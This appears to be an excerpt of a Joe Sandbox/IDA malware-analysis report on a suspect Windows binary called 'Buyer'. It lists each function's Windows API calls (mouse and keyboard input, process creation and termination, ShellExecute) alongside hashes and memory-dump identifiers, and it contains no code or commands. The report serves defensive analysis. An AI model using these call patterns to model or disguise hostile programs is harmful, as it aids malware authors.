                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 642888154-0
                                                                                                    • Opcode ID: 7f80a41e59e9f9d96487f53a8bb5f864051bd7827cb783891b25bb203eef265b
                                                                                                    • Instruction ID: 7751d87eb7660a1743396be1ca49368e06a36b52f4f0adccd59ad9a538ff3717
                                                                                                    • Opcode Fuzzy Hash: 7f80a41e59e9f9d96487f53a8bb5f864051bd7827cb783891b25bb203eef265b
                                                                                                    • Instruction Fuzzy Hash: A241B730A01244AFDB25CF28C499FB47BE2FB05BA4F1C41A6E5884B362CB359847DB43
                                                                                                    Function 00FC2A61 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00FC2A6F
                                                                                                      • Part of subcall function 00FBEC5D: GetWindowRect.USER32(?,?), ref: 00FBEC75
                                                                                                    • GetDesktopWindow.USER32 ref: 00FC2A99
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FC2AA0
                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00FC2ADC
                                                                                                    • GetCursorPos.USER32(?), ref: 00FC2B08
                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FC2B66
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2387181109-0
                                                                                                    • Opcode ID: c56fe1122991301582646d4292760a3e9380d09776d1de9233ec3681d5cea9d7
                                                                                                    • Instruction ID: 90dbf2d38237568877097ade1be1c59e23801ff66fbf104f7d49600168493afc
                                                                                                    • Opcode Fuzzy Hash: c56fe1122991301582646d4292760a3e9380d09776d1de9233ec3681d5cea9d7
                                                                                                    • Instruction Fuzzy Hash: 69319E72505316ABC720DF24D94AF9BB7AAFF84314F00091EF89997191DA74EA04DB92
                                                                                                    Function 00FA5376 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00FA538E
                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FA53AB
                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FA53E3
                                                                                                    • _wcslen.LIBCMT ref: 00FA5401
                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FA5409
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00FA5413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                    • String ID:
                                                                                                    • API String ID: 72514467-0
                                                                                                    • Opcode ID: 23a7592cc23e373dac55b4cfa79e9daced8573c41609bded3f8d41cf44aa841d
                                                                                                    • Instruction ID: 441ad7ecc731618fe5be72ed208323e78fbcb35c9c641f048384678503cad581
                                                                                                    • Opcode Fuzzy Hash: 23a7592cc23e373dac55b4cfa79e9daced8573c41609bded3f8d41cf44aa841d
                                                                                                    • Instruction Fuzzy Hash: B6213BB2604604BBEB159B39DC05E7F7B99DF8AB60F10802AFC05CA191DF65DC41B6A0
                                                                                                    Function 00FD838D Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD83D1
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FD83F6
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FD840E
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD8437
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FBBF1C,00000000), ref: 00FD8457
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FD8442
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2294984445-0
                                                                                                    • Opcode ID: db7073b244001eed64bef092d993e0fbf9ae99c33099745472c98e4c83b2ef9a
                                                                                                    • Instruction ID: 19710d4a0c4d70f12359ccc9fcece3ecfe39355f8e771171263c2d8bb9b021b0
                                                                                                    • Opcode Fuzzy Hash: db7073b244001eed64bef092d993e0fbf9ae99c33099745472c98e4c83b2ef9a
                                                                                                    • Instruction Fuzzy Hash: 2D21A771611246AFCB14DF78CC08B6A37A6FB453B5F19462AF966C32E0DE34D851EB10
                                                                                                    Function 00FA1BB0 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FA1BE1
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FA1BE8
                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FA1BF7
                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00FA1C02
                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FA1C31
                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FA1C45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                    • String ID:
                                                                                                    • API String ID: 1413079979-0
                                                                                                    • Opcode ID: 17a4733d92b4f63a34b7eeaedfa50b54a70e69640c8d0038b4c6d0af970e4048
                                                                                                    • Instruction ID: bb2ac09471d3ba599ddcf611d5dc775a9eae735d7a4ff9eedb5a8800b662bb8d
                                                                                                    • Opcode Fuzzy Hash: 17a4733d92b4f63a34b7eeaedfa50b54a70e69640c8d0038b4c6d0af970e4048
                                                                                                    • Instruction Fuzzy Hash: 6F1137B254120DAFDF028FA8DD49FDE7BAAFF49358F054065FA01A2160D3768D61EB60
                                                                                                    Function 00F636D2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00F636C9,00F63335), ref: 00F636E0
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F636EE
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F63707
                                                                                                    • SetLastError.KERNEL32(00000000,?,00F636C9,00F63335), ref: 00F63759
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: cd8d0369fd202ac456b0cc46aab3b95817d063f3ca8e3be8ed17ad8d424170df
                                                                                                    • Instruction ID: 146e59f57622f2c49a03ede7c8cade6e79cbc7335f524b0b17250e10de202985
                                                                                                    • Opcode Fuzzy Hash: cd8d0369fd202ac456b0cc46aab3b95817d063f3ca8e3be8ed17ad8d424170df
                                                                                                    • Instruction Fuzzy Hash: 100124B7A1E3122EE62566F46C896763B94EB153B9720022AF114410E1EF1A4D027350
                                                                                                    Function 00F730C4 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000000,00F64D33,00000000,?,?,00F668C2,?,?,00000000), ref: 00F730C8
                                                                                                    • _free.LIBCMT ref: 00F730FB
                                                                                                    • _free.LIBCMT ref: 00F73123
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F73130
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F7313C
                                                                                                    • _abort.LIBCMT ref: 00F73142
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: ecb04a649f2b34f1cb526e635222409b187af20f71e70acf7e248856a2049bd4
                                                                                                    • Instruction ID: ed8bfa5059deb11c65da332aecd37ee2c9dae4ceefce9f5e402eac654948e1c8
                                                                                                    • Opcode Fuzzy Hash: ecb04a649f2b34f1cb526e635222409b187af20f71e70acf7e248856a2049bd4
                                                                                                    • Instruction Fuzzy Hash: B6F0F436A4950136C23277387C06B9A372A9FC5770F25C11BF82D92181EF798A017163
                                                                                                    Function 00FD9110 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F5986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                      • Part of subcall function 00F5986F: BeginPath.GDI32(?), ref: 00F598EF
                                                                                                      • Part of subcall function 00F5986F: SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FD913A
                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00FD914E
                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FD915C
                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00FD916C
                                                                                                    • EndPath.GDI32(?), ref: 00FD917C
                                                                                                    • StrokePath.GDI32(?), ref: 00FD918C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 43455801-0
                                                                                                    • Opcode ID: 970c95fbb00a3d4ab871a7790fda4d62842a9f9128c6b45353a71944b172f4c5
                                                                                                    • Instruction ID: 6d2457f5b653d60b3660c897459707bbf69ac39c38009954e043f50a87246442
                                                                                                    • Opcode Fuzzy Hash: 970c95fbb00a3d4ab871a7790fda4d62842a9f9128c6b45353a71944b172f4c5
                                                                                                    • Instruction Fuzzy Hash: B6112D7200114DBFEF129F94DC88E9A7F6EEF08394F04C012FA194A164C7729D55EBA0
                                                                                                    Function 00FA58F6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00FA5911
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FA5922
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA5929
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FA5931
                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FA5948
                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00FA595A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: c30a4e85028ec232dd77b82422e5aebab1627c96c69469e0adce57ae93047965
                                                                                                    • Instruction ID: 4feaf7882148a37a060648d6b8d8d47a5d367b95311fa5a9d1c5669db5b2f3eb
                                                                                                    • Opcode Fuzzy Hash: c30a4e85028ec232dd77b82422e5aebab1627c96c69469e0adce57ae93047965
                                                                                                    • Instruction Fuzzy Hash: CC0144B5E01718BBEB109BF59C49E5E7F79EB49761F044066FA08AB281D6709801DF90
                                                                                                    Function 00F42A8D Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F42ABE
                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F42AC6
                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F42AD1
                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F42ADC
                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F42AE4
                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F42AEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4278518827-0
                                                                                                    • Opcode ID: f15b116fe3f7694d7a3272708248d1279b61fc58ea6a2041c0a643ea8885357c
                                                                                                    • Instruction ID: 3ce11af9eeb45f65ff854c55cbf65a8e6956ac7048584ae2023b8fb9a1055e3f
                                                                                                    • Opcode Fuzzy Hash: f15b116fe3f7694d7a3272708248d1279b61fc58ea6a2041c0a643ea8885357c
                                                                                                    • Instruction Fuzzy Hash: 7D0167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                    Function 00FAF161 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FAF171
                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FAF187
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00FAF196
                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1A5
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1AF
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FAF1B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 839392675-0
                                                                                                    • Opcode ID: 53dfe30fb041a72586e843101681c366c0c6d703053c912a70293f28922aa9d3
                                                                                                    • Instruction ID: 671781738422b3773564f76150661c05406f90a84e1f996e56b6d5c5f8897b9a
                                                                                                    • Opcode Fuzzy Hash: 53dfe30fb041a72586e843101681c366c0c6d703053c912a70293f28922aa9d3
                                                                                                    • Instruction Fuzzy Hash: C8F0177224215CBBE7215BA29C0EEEF7B7DEBC6B11F00005AF6019109096A06A01E6B5
                                                                                                    Function 00F97A49 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F97A62
                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F97A79
                                                                                                    • GetWindowDC.USER32(?), ref: 00F97A85
                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F97A94
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F97AA6
                                                                                                    • GetSysColor.USER32(00000005), ref: 00F97AC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 272304278-0
                                                                                                    • Opcode ID: 374a08102ea066b161619672f7382298348b0f69ab5f3ef039526dce0a1fa742
                                                                                                    • Instruction ID: 4e7aa40f863bdca6a27f68a2502ebe6f6f3287dc37d7de76899b4148a59a7bd1
                                                                                                    • Opcode Fuzzy Hash: 374a08102ea066b161619672f7382298348b0f69ab5f3ef039526dce0a1fa742
                                                                                                    • Instruction Fuzzy Hash: 1F01E832545209EFEB51ABB0DC08BAE7BB6FB44321F2901A1F925A21B0CB355E51AF51
                                                                                                    Function 00FACBB5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FACCD3
                                                                                                    • _wcslen.LIBCMT ref: 00FACD1A
                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FACD81
                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FACDAF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                    • Opcode ID: 74ed912597565a0a2b0a66c5e47c54a4189bd31c21b507e886583fbee19ea3e4
                                                                                                    • Instruction ID: 8f6d4f6d18f1ce5a724e3f04ab380d336b7646b5ade204a047a23d55e18d2e32
                                                                                                    • Opcode Fuzzy Hash: 74ed912597565a0a2b0a66c5e47c54a4189bd31c21b507e886583fbee19ea3e4
                                                                                                    • Instruction Fuzzy Hash: 1851B0B1A143409BD7259F28CC85B6BBBE8EF46364F040A2DF9A5D7290DB74C904A792
                                                                                                    Function 00FCB4EB Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00FCB62A
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00FCB6BF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCB6EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                    • String ID: <$@
                                                                                                    • API String ID: 146682121-1426351568
                                                                                                    • Opcode ID: ac37c5b292c536081b67b22ba39b974613b20b68672e8709bb1f9cb1d900aa1c
                                                                                                    • Instruction ID: d6ef87f917eeaa47e5722c2ce4c96b91b73ee3729a8c676730b83510c31f08f1
                                                                                                    • Opcode Fuzzy Hash: ac37c5b292c536081b67b22ba39b974613b20b68672e8709bb1f9cb1d900aa1c
                                                                                                    • Instruction Fuzzy Hash: F3715975A0021ADFCB14EF64C986A9EBBF1FF08314F048499E855AB352CB74ED45EB90
